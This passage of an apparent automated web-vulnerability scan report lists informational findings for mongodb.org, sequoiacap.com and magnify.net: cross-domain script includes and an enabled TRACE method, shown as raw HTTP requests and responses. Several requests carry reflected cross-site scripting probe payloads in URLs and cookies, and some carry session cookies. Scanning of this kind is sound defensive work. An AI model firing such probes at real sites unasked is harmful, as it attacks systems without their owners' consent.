GET /display/DOCS/Home HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:20 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843800585 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 37810 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Home - MongoDB</title> ...[SNIP]... <link rel="search" type="application/opensearchdescription+xml" href="/opensearch/osd.action" title="10gen Confluence"/> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"> </script>...[SNIP]...
13.14. http://www.mongodb.org/display/DOCS/Source+Code
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/display/DOCS/Source+Code
Issue detail
The response dynamically includes the following scripts from other domains:http://disqus.com/forums/mongodb/embed.js http://munchkin.marketo.net/munchkin.js
Request
GET /display/DOCS/Source+Code HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/ Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.3.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 200 OK Date: Wed, 09 Nov 2011 13:03:31 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1320843811914 Vary: User-Agent Content-Type: text/html;charset=UTF-8 Content-Length: 30118 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Source Code - MongoDB</title> ...[SNIP]... <link rel="search" type="application/opensearchdescription+xml" href="/opensearch/osd.action" title="10gen Confluence"/> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"> </script>...[SNIP]... </div><script type="text/javascript" src="http://disqus.com/forums/mongodb/embed.js"> </script>...[SNIP]...
13.15. http://www.sequoiacap.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET / HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.5.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A14; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "4bb124f99c6a9bb4eb73223b68dcde61" X-Runtime: 4 Cache-Control: private, max-age=0, must-revalidate Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 43608 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.16. http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072 HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 404 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Cache-Control: no-cache Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 7117 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.17. http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(1)%3C/script%3Ecf97f530072
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/42fa0%3Cscript%3Ealert(1)%3C/script%3Ecf97f530072
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /42fa0%3Cscript%3Ealert(1)%3C/script%3Ecf97f530072 HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.26.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A15%3A29; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2; meebo-cim-session=1805744a324b36a91d9e; __qca=P0-814646353-1320848070265
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 404 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Cache-Control: no-cache Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 7139 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.18. http://www.sequoiacap.com/ideas
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/ideas
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /ideas HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/us/early Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.13.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A47; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "e9723ded5b28e7d870ff66e141ad657a" X-Runtime: 14 Cache-Control: private, max-age=0, must-revalidate Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 14402 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:l...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.19. http://www.sequoiacap.com/us
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/us
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /us HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072 Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.3.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A07; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "2ce62202d316c335ea3c4968649b78a9" X-Runtime: 6 Set-Cookie: last_visited_region=2; path=/; expires=Wed, 09-Nov-2011 14:23:12 GMT Cache-Control: private, max-age=0, must-revalidate Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 116628 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:l...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.20. http://www.sequoiacap.com/us/early
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/us/early
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /us/early HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/ Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.9.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A25; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "b5759744ca3e78673b11c0d5c25d8141" X-Runtime: 8 Set-Cookie: last_visited_region=2; path=/; expires=Wed, 09-Nov-2011 14:23:33 GMT Cache-Control: private, max-age=0, must-revalidate Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 77138 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:l...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.21. http://www.sequoiacap.com/us/earth-networks
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/us/earth-networks
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /us/earth-networks HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/us/early Cookie: _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.11.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A35; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 200 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 ETag: "3d4fd8f354133a90a1b78e6cb16b2465" X-Runtime: 8 Set-Cookie: last_visited_region=2; path=/; expires=Wed, 09-Nov-2011 14:23:46 GMT Cache-Control: private, max-age=0, must-revalidate Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 10037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:l...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.22. http://www.sequoiacap.com/us/zzzzzz=yyyyy
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/us/zzzzzz=yyyyy
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /us/zzzzzz=yyyyy HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.sequoiacap.com/us/earth-networks Cookie: __utmx_k_8942828=1; _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.13.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A35; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 404 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Set-Cookie: last_visited_region=2; path=/; expires=Wed, 09-Nov-2011 14:23:48 GMT Cache-Control: no-cache Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 7057 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
13.23. http://www.sequoiacap.com/us/zzzzzz=yyyyy/early
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/us/zzzzzz=yyyyy/early
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /us/zzzzzz=yyyyy/early HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.sequoiacap.com/us/early Cookie: __utmx_k_180827134=1; _chartbeat2=5usrz6n7rcg4gz82.1320847983152; __utma=10332215.1169115190.1320847984.1320847984.1320847984.1; __utmb=10332215.11.10.1320847984; __utmc=10332215; __utmz=10332215.1320847984.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=10332215.autoregion%3Dus; __utmx=10332215.; __utmxx=10332215.; hubspotdt=2011-11-09%2009%3A13%3A25; hubspotutk=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvd=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvw=3cfacfddb6084c9f9b1dbfcb946f963c; hubspotvm=3cfacfddb6084c9f9b1dbfcb946f963c; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F42fa0%253Cscript%253Ealert(%2FXSS%2F)%253C%2Fscript%253Ecf97f530072|http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue|2011-11-09%2009%3A13%3A07; last_visited_region=2
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Connection: keep-alive Status: 404 X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Set-Cookie: last_visited_region=2; path=/; expires=Wed, 09-Nov-2011 14:23:36 GMT Cache-Control: no-cache Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Length: 7057 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=...[SNIP]... </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#username=seqcap" type="text/javascript"> </script>...[SNIP]...
14. TRACE method is enabled
previous
next
There are 2 instances of this issue:
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received. Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
14.1. http://www.magnify.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.magnify.net
Path:
/
Request
TRACE / HTTP/1.0 Host: www.magnify.net Cookie: 577c04770b7505d0
Response
HTTP/1.1 200 OK Server: Apache Content-Type: message/http X-Magnify-URL-Class: modperl-nocache Content-Length: 177 Date: Wed, 09 Nov 2011 13:20:24 GMT X-Varnish: 1394906993 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS TRACE / HTTP/1.0 Cookie: 577c04770b7505d0 Host: www.magnify.net X-Forwarded-For: 50.23.123.106, 50.23.123.106 X-Magnify-URL-Class: modperl-nocache X-Varnish: 1394906993
14.2. http://www.mongodb.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/
Request
TRACE / HTTP/1.0 Host: www.mongodb.org Cookie: 5dd817a48b5d76b1
Response
HTTP/1.1 200 OK Server: Apache/2.2.16 (Amazon) Content-Type: message/http Date: Wed, 09 Nov 2011 13:03:12 GMT Connection: close TRACE / HTTP/1.0 Host: www.mongodb.org X-Cluster-Client-Ip: 50.23.123.106 Cookie: 5dd817a48b5d76b1 ; __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0 Connection: Keep-Alive
15. Email addresses disclosed
previous
next
There are 5 instances of this issue:
Issue background
